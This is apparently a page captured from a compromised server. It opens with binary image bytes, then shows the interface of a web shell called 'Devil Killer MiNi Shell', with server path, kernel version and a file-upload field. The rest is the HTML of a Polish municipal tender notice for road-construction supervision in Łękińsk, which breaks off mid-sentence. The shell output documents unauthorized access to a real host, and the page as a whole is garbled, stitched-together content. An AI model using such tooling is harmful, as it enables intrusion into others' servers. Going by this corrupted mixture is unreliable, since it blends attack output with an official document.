JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20221109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20221109/0043259101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi nadzoru inwest. nad real. inwestycji: Bud. układu drog., wraz z infrastr. tech., w Łękińsku w rejonie ul. Łąkowej, ul. Północnej, ul. Rolnej i ul. Ustronnej w podziale na 2 części. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kleszczów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590647983</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Główna 47</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kleszczów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-410</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">447316639</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia-publiczne@kleszczow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kleszczow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi nadzoru inwest. nad real. inwestycji: Bud. układu drog., wraz z infrastr. tech., w Łękińsku w rejonie ul. Łąkowej, ul. Północnej, ul. Rolnej i ul. Ustronnej w podziale na 2 części. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1679794b-6016-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00432591</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00051094/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Nadzór inwestorski (br. dorgowa, wod - kan, elektryczna i telekom.) nad rozbudową sieci dróg gminnych wraz z budową infrastruktury technicznej w Łękińsku w rejonie ulicy Ustronnej i Rolnej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-zp.kleszczow.pl/procurements <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-zp.kleszczow.pl/procurements</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)W postęp. o udzielenie zam.<br/>komunikacja między Zam. a wyk. odbywa się przy użyciu Systemu e-ZP https://e-zp.kleszczow.pl/procurements lub poczty<br/>elektronicznej, adres e-mail: zamowieniaubliczne@kleszczow.pl<br/>2) Wyk. zamierzający wziąć udział w postęp. o udziel. zam. publ., musi posiadać konto w Sys. e-ZP.<br/>3) Rejestracja i korzystanie z Systemu E-ZP jest bezpłatne.<br/>4)Użytkownik niezarejestrowany może jedynie przeglądać treści udostępniane w części publicznej Systemu. Jest to równoznaczne z<br/>tym, że użytkownicy niezarejestrowani nie posiadają dostępu do wszystkich funkcjonalności systemu.<br/>5)Dokonując rejestracji Wyk. akceptuje Regulamin korzystania z Systemu E-Zamówienia Publiczne Gminy Kleszczów.<br/>6) W Systemie E-ZP znajduje się także instrukcja dla Wyk. (Instrukcja obsługi Systemu FINN e-Zamówienia Publiczne) oraz filmy<br/>instruktażowe - prezentujące podstawowe czynności dokonywane przez Wykonawców za pomocą Systemu (rejestracja, zadawanie<br/>pytań, złożenie oferty, wycofanie oferty). Instrukcja dostępna jest pod adresem: https://pomoc.e-zp.finn.pl/<br/>7)Złożenie oferty poprzez System e-ZP wymaga posiadania przez Wykonawcę kwalifikowanego podpisu elektronicznego lub<br/>podpisu osobistego lub podpisu zaufanego.<br/>8) Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych Systemu E-ZP:<br/>a)Format kodowania treści w obrębie Systemu - UTF8,<br/>b)Komunikacja pomiędzy przeglądarką Wykonawcy, a serwerem jest wykonywana przy użyciu bezpiecznego protokołu HTTPS,<br/>c)Oznaczeniem czasu odbioru danych przez System jest data oraz dokładny czas (hh:mm:ss) – czas lokalny serwera<br/>synchronizowany odpowiednim źródłem czasu.<br/>9)Wymagania techniczne związane z korzystaniem z Systemu (tj. informacje dotyczące specyfikacji połączenia, formatu<br/>przesyłanych danych oraz kodowania i oznaczania czasu przekazania danych):<br/>a)stały dostęp do sieci Internet i minimalna prędkość połączenia internetowego nie mniejsza niż 512 kb/s;<br/>b)zaktualizowana przeglądarka internetowa Chrome w wersji 77 i późniejsze lub Mozilla Firefox w wersji 63 i późniejsze;<br/>c)system operacyjny Microsoft Windows 7 i późniejsze lub Apple macOS 10.14 i późniejsze, dystrybucje systemu Linux.<br/>d)korzystanie z wbudowanej w System e-ZP funkcjonalności składania podpisu elektronicznego (kwalifikowany podpis elektroniczny,<br/>osobisty i zaufany) możliwe jest pod warunkiem, że system teleinformatyczny, z którego korzysta Wykonawca, wyposażony jest w<br/>jeden z poniższych komponentów:<br/>•wirtualna maszyna Java firmy Oracle w wersji co najmniej 1.8.0_221 (Java SE JRE 8 Update 221) z obsługą technologii Java Web<br/>Start (JavaWS) lub<br/>•wirtualna maszyna OpenJDK w wersji co najmniej 1.8.0_222 z zainstalowanym rozszerzeniem IcedTea Web Start.<br/>10)Powyższe wymagania nie ograniczają możliwości korzystania przez Wykonawcę z zewnętrznego oprogramowania do składania<br/>podpisu elektronicznego,<br/>a)kwalifikowany podpis elektroniczny (dopuszczalne formaty podpisów: PaDES - format.pdf, XaDES -pozostałe formaty);<br/>b)podpis zaufany;<br/>c)certyfikat osobisty;<br/>d)dopuszczalne formaty danych, w szczególności: .txt, .pdf, .xls, .doc,.docx, .rtf, .odt, .zip, .xml, .rar, (zalecany .pdf);<br/>e)Maksymalny rozmiar przesyłanych plików złożenia, wycofania: oferty/ wniosku o dopuszczenie do udziału w postępowaniu/ oferty<br/>dodatkowej w trybie podstawowym/ oferty ostatecznej/ oferty dodatkowej oraz wiadomości wynosi 150 MB;<br/>f)w zakresie dotyczącym kodowania i czasu odbioru danych Zamawiający informuje, że złożona przez Wykonawcę za pomocą<br/>Systemu e-ZP oferta jest widoczna w systemie, jako zaszyfrowana, a możliwość jej odszyfrowania i otworzenia przez<br/>Zamawiającego możliwa jest po upływie terminu składania ofert;<br/>11)W zależności od formatu podpisu: Podpis kwalifikowany (PAdES, XAdES), podpis osobisty (XAdES), podpis zaufany (PAdES,<br/>XAdES) i jego typu (zewnętrzny, otaczający) Wykonawca dołącza do Systemu e-ZP uprzednio podpisane dokumenty wraz z<br/>wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z podpisem (typ otacz.).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">a)	Administratorem Pani/Pana danych osobowych jest Gmina Kleszczów, mająca swoją siedzibę w Urzędzie Gminy w Kleszczowie, przy ul. Głównej 47, 97-410 Kleszczów.<br/>b)	Wyznaczyliśmy Inspektora ochrony danych, od którego można uzyskać więcej informacji o przetwarzaniu danych osobowych. Kontakt do Inspektora: e-mail: iod@kleszczow.pl, adres: Inspektor ochrony danych, ul. Główna 47, 97-410 Kleszczów.<br/>c)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b i c RODO w związku z udziałem w postępowaniu o udzielenie zamówienia publicznego ZP.271.29.2022 prowadzonym w trybie przetargu podstawowym na podstawie art. 275 pkt 1 ustawy.<br/>d)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, dalej „ustawa Pzp” oraz ustawy z dnia 6 września 2001 roku – o dostępie do informacji publicznej.<br/>e)	Pani/Pana dane osobowe będą przetwarzane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przetwarzania obejmuje cały czas trwania umowy. Zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych dokumentacja zamówień publicznych posiada kategorię archiwalną B5 (okres przechowywania 5 lat) natomiast umowa zawarta w wyniku postępowania w trybie zamówień publicznych posiada kategorię archiwalną B10 (okres przechowywania 10 lat).<br/>f)	Obowiązek podania przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>g)	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany.<br/>h)	Posiada Pani/Pan: <br/>− prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− prawo do sprostowania Pani/Pana danych osobowych; <br/>− prawo żądania ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 RODO, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>2. Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.29.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1. Świadczenie usługi nadzoru inwestorskiego nad realizacją inwestycji: Budowa układu drogowego, wraz z infrastrukturą techniczną, w Łękińsku w rejonie ul. Łąkowej, ul. Północnej, ul. Rolnej i ul. Ustronnej. Budowa układu drogowego o długości ok. 1,27 km, wraz z infrastrukturą techniczną, pomiędzy ul. Łąkową i ul. Rolną w Łękińsku.<br/> Świadczenie usługi nadzoru inwestorskiego nad realizacją robót budowlanych obejmuje w szczególności: <br/>a)	budowa układu drogowego,<br/>	droga nr D-1 zawierająca jezdnię wraz ze ścieżką rowerową i chodnikiem,<br/>	droga nr D-2 zawierająca jezdnię wraz z obustronnym chodnikiem,<br/>	droga nr D-3 zawierająca jezdnię wraz z obustronnym chodnikiem,<br/>	droga nr D-4 zawierająca jezdnię wraz z obustronnym chodnikiem,<br/>	skrzyżowanie drogi nr D-1 z ulicą Rolną,<br/>	skrzyżowanie drogi nr D-2 z ulicą Łąkową,<br/>	skrzyżowanie drogi nr D-2 z ulicą Rolną,<br/>	skrzyżowanie drogi nr D-2 z drogą nr D-3,<br/>	skrzyżowanie drogi nr D-3 z drogą nr D-4,<br/>	skrzyżowanie drogi nr D-3 z ulicą Ustronną,<br/>	plac do zawracania na drodze nr D-4,<br/>	zjazdy indywidualne do działek wzdłuż projektowanego układu drogowego<br/>b)	rozbudowa infrastruktury technicznej towarzyszącej:<br/>	rozbudowa sieci wodociągowej wraz z budową przyłączy do działek wzdłuż projektowanego układu drogowego,<br/>	rozbudowa sieci kanalizacji sanitarnej wraz z budową przyłączy do działek wzdłuż projektowanego układu drogowego,<br/>	rozbudowa sieci kanalizacji deszczowej wraz z budową przyłączy do działek wzdłuż projektowanego układu drogowego,<br/>	rozbudowa sieci gazowej wraz z budową przyłączy do działek wzdłuż projektowanego układu drogowego,<br/>	budowa kanału technologicznego ulicznego (ktu) i przepustowego (ktp) wraz <br/>	z budową przyłączy do działek wzdłuż projektowanego układu drogowego,<br/>	rozbudowa sieci elektroenergetycznej niskiego napięcia nn wraz z budową złączy kablowych do działek wzdłuż projektowanego układu drogowego,<br/>	rozbudowa sieci oświetlenia ulicznego wzdłuż projektowanego układu drogowego <br/>	rozbudowa sieci elektroenergetycznej średniego napięcia SN,<br/>	wyburzenia odcinków istniejących chodników w miejscu włączenia projektowanych dróg w istniejące ulice,<br/>	demontaże i przekładki odcinków sieci infrastruktury technicznej kolidującej <br/>	z infrastrukturą projektowaną,<br/>	dostosowanie istniejących zwieńczeń studni kanalizacyjnych sanitarnych, deszczowych i teletechnicznych oraz skrzynek ulicznych wodociągowych do rzędnych projektowanych obiektów drogowych oraz do obciążenia jak dla ruchu ciężkiego.<br/>c)	wykonanie nowego oznakowania poziomego i oznakowania pionowego,<br/>d)	wykonanie i wdrożenie tymczasowej organizacji ruchu na czas robót.<br/>e)	zapewnienie biura budowy i zaplecza budowy na czas robót,<br/>f)	dostawa mediów na potrzeby budowy,<br/>g)	pełna obsługa geodezyjna i laboratoryjna robót<br/>h)	zapewnienie nadzoru nad robotami przez uprawnione osoby zgodnie z Umową,<br/>i)	pozyskanie wszystkich wymaganych decyzji administracyjnych i zgłoszeń umożliwiających zgodne z prawem użytkowanie obiektu,<br/>j)	świadczenie gwarancji i rękojmi przez okres 7 lat od daty odbioru końcowego.<br/>k)	koordynacja robót z równolegle trwającymi pracami dla Części 2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71521000-6 - Usługi nadzorowania placu budowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">25 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która nie zostanie odrzucona na podstawie art. 226 ust. 1 Pzp oraz uzyska maksymalną liczbę punktów na podstawie kryteriów oceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie kadry Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2. Świadczenie usługi nadzoru inwestorskiego nad realizacją inwestycji: Budowa układu drogowego, wraz z infrastrukturą techniczną, w Łękińsku w rejonie ul. Łąkowej, ul. Północnej, ul. Rolnej i ul. Ustronnej. Budowa układu drogowego o długości ok. 1,91 km, wraz z infrastrukturą techniczną, w rejonie ul. Rolnej w Łękińsku.<br/>Świadczenie usługi nadzoru inwestorskiego nad realizacją robót budowlanych obejmuje w szczególności:<br/>a)	budowa układu drogowego,<br/>	droga nr D-1 wraz ze ścieżką rowerową, chodnikiem i fragmentami ciągów pieszo-jezdnych,<br/>	droga nr D-2 wraz z obustronnym chodnikiem,<br/>	droga nr D-3 wraz z obustronnym chodnikiem,<br/>	droga nr D-4 wraz z obustronnym chodnikiem,<br/>	droga nr D-5 wraz z obustronnym chodnikiem oraz fragmentami ciągów pieszo-jezdnych<br/>	ciąg pieszo-jezdny od skrzyżowania drogi nr D-1 z drogą nr D-5 do istniejącej jezdni asfaltowej łączącej się z ulicą Północną,<br/>	skrzyżowanie drogi nr D-1 z ulicą Rolną,<br/>	skrzyżowanie drogi nr D-2 z ulicą Rolną,<br/>	skrzyżowanie drogi nr D-3 z ulicą nr D-5,<br/>	skrzyżowanie drogi nr D-1 z drogą nr D-4,<br/>	skrzyżowanie drogi nr D-1 z drogą nr D-5,<br/>	skrzyżowanie drogi nr D-2 z drogą nr D-5,<br/>	skrzyżowanie drogi nr D-4 z drogą nr D-2,<br/>	skrzyżowanie drogi nr D-3 z ulicą Ustronną,<br/>	dwa place do zawracania na drodze nr D-4,<br/>	plac do zawracania na drodze nr D-5,<br/>	przejezdny plac do zawracania na drodze nr D-3,<br/>	przebudowa odcinka istniejącego rowu przydrożnego wraz z budową przepustów rurowych,<br/>	zjazdy indywidualne do działek wzdłuż projektowanego układu drogowego<br/>b)	rozbudowa infrastruktury technicznej towarzyszącej:<br/>	rozbudowa sieci wodociągowej wraz z budową przyłączy do działek wzdłuż projektowanego układu drogowego,<br/>	rozbudowa sieci kanalizacji sanitarnej wraz z budową przyłączy do działek wzdłuż projektowanego układu drogowego,<br/>	rozbudowa sieci kanalizacji deszczowej wraz z budową przyłączy do działek wzdłuż projektowanego układu drogowego, wraz z budową zbiornika odparowującego oraz rowu odprowadzającego,<br/>	rozbudowa sieci gazowej wraz z budową przyłączy do działek wzdłuż projektowanego układu drogowego,<br/>	budowa kanału technologicznego ulicznego (ktu) i przepustowego (ktp) wraz <br/>	z budową przyłączy do działek wzdłuż projektowanego układu drogowego,<br/>	rozbudowa sieci elektroenergetycznej niskiego napięcia nn wraz z budową złączy kablowych do działek wzdłuż projektowanego układu drogowego,<br/>	rozbudowa sieci oświetlenia ulicznego wzdłuż projektowanego układu drogowego,<br/>	rozbudowa sieci elektroenergetycznej średniego napięcia SN z budową stacji transformatorowej STLE-7,<br/>	wyburzenia odcinków istniejących chodników w miejscu włączenia projektowanych dróg w istniejące ulice,<br/>	demontaże i przekładki odcinków sieci infrastruktury technicznej kolidującej <br/>	z infrastrukturą projektowaną,<br/>	dostosowanie istniejących zwieńczeń studni kanalizacyjnych sanitarnych, deszczowych i teletechnicznych oraz skrzynek ulicznych wodociągowych do rzędnych projektowanych obiektów drogowych.<br/>	obiektów drogowych oraz do obciążenia jak dla ruchu ciężkiego.<br/>c)	wykonanie nowego oznakowania poziomego i oznakowania pionowego,<br/>d)	wykonanie i wdrożenie tymczasowej organizacji ruchu na czas robót.<br/>e)	zapewnienie biura budowy i zaplecza 